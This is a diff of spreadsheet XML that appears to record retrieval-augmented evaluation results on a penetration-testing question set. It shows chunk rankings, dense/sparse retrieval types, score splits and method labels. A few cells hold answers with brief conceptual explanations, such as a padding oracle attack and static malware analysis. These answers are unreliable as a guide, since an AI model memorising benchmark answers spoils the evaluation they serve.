         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J145" t="n">
@@ -10200,7 +10178,7 @@
       </c>
       <c r="K145" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10248,18 +10226,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 18e2ae8c-7b32-42a9-9045-7872388878c2, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 4b09196a-8b79-4c16-a50f-df9b49b8c5ea, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 9aa0bfc8-f4fe-4359-bbb9-8ebb0378d387, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 9aa0bfc8-f4fe-4359-bbb9-8ebb0378d387, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: sparse, Rank: 8)
 solidstate-writeup-w-o-metasploit.md (Chunk: 4e5cb313-057e-41c8-a553-db7ebf11e23b, Type: dense, Rank: 9)
 cowWhySo-pentest-redteam-steering.md (Chunk: 22ef7d6c-d646-4b82-977f-076f07d89cfd, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I146" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J146" t="n">
@@ -10267,7 +10245,7 @@
       </c>
       <c r="K146" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10318,15 +10296,15 @@
 preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I147" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J147" t="n">
@@ -10334,7 +10312,7 @@
       </c>
       <c r="K147" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10401,7 +10379,7 @@
       </c>
       <c r="K148" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10436,7 +10414,7 @@
       <c r="F149" t="inlineStr">
         <is>
           <t>Answer: Padding Oracle Attack
-Explanation: A Padding Oracle Attack is the most effective in this scenario because it specifically exploits vulnerabilities related to how padding is checked and managed during decryption in cipher block chaining (CBC) mode. It allows an attacker to decrypt data by making adaptive guesses and observing the responses to these guesses from the target system, ultimately revealing the plaintext. The bit flipping attack, although relevant to CBC mode, primarily involves manipulating encrypted data to alter the plaintext, rather than exploiting padding directly. A replay attack involves retransmitting valid data to perform unauthorized actions, and a man-in-the-middle attack involves intercepting and possibly altering communications between two parties; neither focus specifically on shortcomings in encryption padding handling, making them less suitable choices for this scenario.</t>
+Explanation: A Padding Oracle Attack is the most effective in this scenario because it leverages vulnerabilities related to how padding is checked and managed during decryption in cipher block chaining (CBC) mode. It allows an attacker to decrypt data by making adaptive guesses and observing the responses to these guesses from the target system, ultimately revealing the plaintext. The bit flipping attack, although relevant to CBC mode, primarily involves manipulating encrypted data to alter the plaintext, rather than exploiting padding directly. A replay attack involves retransmitting valid data to perform unauthorized actions, and a man-in-the-middle attack involves intercepting and possibly altering communications between two parties; neither focus specifically on shortcomings in encryption padding handling, making them less suitable choices for this scenario.</t>
         </is>
       </c>
       <c r="G149" t="inlineStr">
@@ -10452,15 +10430,15 @@
 preemware_pentestingeval.pdf (Chunk: c63b7be0-9513-4094-b110-716268eb972f, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 12e2112e-6dac-4ee5-bb17-ffc18f57f1ec, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: f763cdb5-6965-4d89-8a52-efa5fe071b81, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I149" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J149" t="n">
@@ -10468,7 +10446,7 @@
       </c>
       <c r="K149" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10519,15 +10497,15 @@
 preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 9686cf15-5df0-49f8-9592-fef3f765639f, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 9686cf15-5df0-49f8-9592-fef3f765639f, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I150" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J150" t="n">
@@ -10535,7 +10513,7 @@
       </c>
       <c r="K150" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10570,7 +10548,7 @@
       <c r="F151" t="inlineStr">
         <is>
           <t>Answer: Performing static code analysis on the executable
-Explanation: Performing static code analysis on the executable is the most effective initial approach when dealing with an unknown potentially malicious file. This technique involves reviewing the executable's code without running it, thereby avoiding the activation of any malicious payloads it might carry. This is critical in understanding the behavior of the executable and identifying potential malicious activities before attempting to execute it. While analyzing network traffic can provide insights into external communications, using a debugger to monitor registry changes or automated vulnerability scanning tools may not directly assist in understanding the internal mechanics of the executable.</t>
+Explanation: Performing static code analysis on the executable is the most effective initial approach when dealing with an unknown potentially malicious file. This technique involves reviewing the executable's code without running it, thereby avoiding the activation of any malicious payloads it might carry. This is critical in understanding the behavior of the executable and identifying potential malicious activities before executing the code. While analyzing network traffic can provide insights into external communications, using a debugger to monitor registry changes or automated vulnerability scanning tools may not directly assist in understanding the internal mechanics of the executable.</t>
         </is>
       </c>
       <c r="G151" t="inlineStr">
@@ -10582,19 +10560,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 04959762-acf0-4790-99fb-7524a2352b4c, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 24d42d52-9752-47f6-b94e-1701dca4040a, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I151" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J151" t="n">
@@ -10602,7 +10580,7 @@
       </c>
       <c r="K151" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10650,18 +10628,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 76451418-5bee-4e13-b950-55a69470f2ad, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 94a5825c-3c24-4426-98b6-0f15dd480b28, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 83e98874-cd3b-47fc-9052-268ced6cea53, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 8741919d-841b-47ab-a119-1bb63d066d47, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 94a5825c-3c24-4426-98b6-0f15dd480b28, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 83e98874-cd3b-47fc-9052-268ced6cea53, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 8741919d-841b-47ab-a119-1bb63d066d47, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: fd0fe897-462c-4c72-9fee-81b32fc6d466, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: fd0fe897-462c-4c72-9fee-81b32fc6d466, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I152" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J152" t="n">
@@ -10669,7 +10647,7 @@
       </c>
       <c r="K152" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10739,7 +10717,7 @@
       </c>
       <c r="K153" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10786,19 +10764,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 608f8017-318e-4a0f-9ce4-2b9b37ef7214, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 69250b66-f38a-4bf6-9f09-e3c676c2c002, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 69250b66-f38a-4bf6-9f09-e3c676c2c002, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I154" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J154" t="n">
@@ -10806,7 +10784,7 @@
       </c>
       <c r="K154" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10859,19 +10837,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 37f43b1b-776c-4ad7-a565-c62d5b4c3832, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 831f9734-1696-4ce4-bc1c-6b14be8556f2, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 66d16429-d931-4984-bd59-02b90fff1053, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 831f9734-1696-4ce4-bc1c-6b14be8556f2, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 66d16429-d931-4984-bd59-02b90fff1053, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 011afc4e-bb91-4810-a4fa-6b97859f49a0, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 4dec9ffa-64db-4e01-93c9-05970e09eb32, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 4dec9ffa-64db-4e01-93c9-05970e09eb32, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I155" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J155" t="n">
@@ -10879,7 +10857,7 @@
       </c>
       <c r="K155" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10926,7 +10904,7 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 3f225d2c-0ef3-4965-b92e-6d8835cde99d, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 3f225d2c-0ef3-4965-b92e-6d8835cde99d, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: c5ddafd2-8e53-4743-8d2a-c26ad6e16928, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 6)
@@ -10938,7 +10916,7 @@
       </c>
       <c r="I156" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J156" t="n">
@@ -10946,7 +10924,7 @@
       </c>
       <c r="K156" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -10993,19 +10971,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 439ca02a-a623-4276-a4a5-633f63b20d45, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: bf89b19f-54ce-4995-8751-2aba1ebabf11, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4e5b79c1-1f7a-487a-969b-e826f89f1cdf, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d83b16e3-cab4-4909-9965-40af03525749, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: d83b16e3-cab4-4909-9965-40af03525749, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 910ca37f-8473-43ad-8ff6-39a3367872c4, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: sparse, Rank: 7)
 cowWhySo-pentest-redteam-steering.md (Chunk: e42608c6-39af-4dee-af44-6fe9b8321000, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 54029d28-0316-4b60-b3a4-46cb1d3ed1b7, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 54029d28-0316-4b60-b3a4-46cb1d3ed1b7, Type: sparse, Rank: 9)
 cowWhySo-pentest-redteam-steering.md (Chunk: 974c40f1-541e-4fbb-9528-9a36ca484597, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I157" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J157" t="n">
@@ -11013,7 +10991,7 @@
       </c>
       <c r="K157" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -11080,7 +11058,7 @@
       </c>
       <c r="K158" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -11132,14 +11110,14 @@
 preemware_pentestingeval.pdf (Chunk: 36e54dab-ab32-4509-abd8-e70613c1ce77, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 863931e2-a680-4ee8-846b-f4053787bdc1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 7b4d8289-6113-4807-b123-d481e481c42c, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 18e2ae8c-7b32-42a9-9045-7872388878c2, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I159" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J159" t="n">
@@ -11147,7 +11125,7 @@
       </c>
       <c r="K159" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -11200,13 +11178,13 @@
 preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I160" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J160" t="n">
@@ -11214,7 +11192,7 @@
       </c>
       <c r="K160" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -11263,17 +11241,17 @@
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I161" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J161" t="n">
@@ -11281,7 +11259,7 @@
       </c>
       <c r="K161" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -11329,18 +11307,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: a50681c0-06cb-4ca1-821f-95ab56a6e118, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 5177461e-afd1-4f30-b34b-33dd723a5123, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 6a3bf430-df4e-48ec-a031-aa60204cb560, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: f53bcf96-b827-40a0-b89b-027325a9a32e, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 7e2feb30-1a3a-4b3e-b712-d9cbf873f1a0, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 53f2edb6-1d2d-4870-ae57-8bfa8a746aa3, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 6bfd15ed-9fdd-4602-827d-fc1e81332c5c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 54801486-4542-4df6-8d24-be9d01b89403, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 6bfd15ed-9fdd-4602-827d-fc1e81332c5c, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 54801486-4542-4df6-8d24-be9d01b89403, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I162" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J162" t="n">
@@ -11348,7 +11326,7 @@
       </c>
       <c r="K162" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
